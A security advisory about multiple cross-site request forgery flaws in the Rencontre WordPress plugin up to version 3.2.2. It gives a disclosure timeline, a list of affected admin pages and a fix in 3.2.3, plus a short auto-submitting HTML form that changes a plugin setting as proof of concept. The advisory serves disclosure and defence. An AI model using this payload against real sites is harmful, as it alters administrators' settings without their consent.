Rencontre <= 3.2.2 - Multiple CSRF



Description
The plugins is affected by multiple CSRF issues, allowing arbitrary changes of the plugin's settings.

November 3rd, 2019 - WordPress Plugin Team Notified
November 5th, 2019 - WP Plugins Team acknowledgments of the issue.
December 2nd, 2019 - v3.2.2 released, none of the CSRF have been fixed as the nonces have only been set in AJAX actions.
December 8th, 2019 - WP Plugins Team notified again
December 10th, 2019 - Plugin closed for review
December 11th, 2019 - v3.2.3 Released, fixing the issues
December 22nd, Plugin re-opened
Proof of Concept
Affected Pages:
/wp-admin/admin.php?page=rencontre.php
/wp-admin/admin.php?page=rencontre.php&renctab=log
/wp-admin/admin.php?page=rencontre.php&renctab=dis
/wp-admin/admin.php?page=rencontre.php&renctab=mel
/wp-admin/admin.php?page=rencmembers
/wp-admin/admin.php?page=rencjail
/wp-admin/admin.php?page=rencprofile (Update Member Profile, Add/Remove Language)
/wp-admin/admin.php?page=renccountry (Add/Remove Language)
/wp-admin/admin.php?page=renccountry&renctab=cle
/wp-admin/admin.php?page=renccustom
/wp-admin/admin.php?page=renccustom&renctab=wor
/wp-admin/admin.php?page=renccustom&renctab=sea
/wp-admin/admin.php?page=renccustom&renctab=tem

For example, the below CSRF attack will change the "Number of days in jail (deleted account)" setting to 7

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://[WP]/wp-admin/admin.php?page=rencontre.php" method="POST">
      <input type="hidden" name="prison" value="7" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 3.2.3

References

URL https://plugins.trac.wordpress.org/changeset?new=2215566%40rencontre&old=2209198%40rencontre

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Views 91407
Verified No
WPVDB ID 9980

Timeline

Publicly Published 2019-12-22 (about 1 month ago)
Added 2019-12-22 (about 1 month ago)
Last Updated 2019-12-22 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin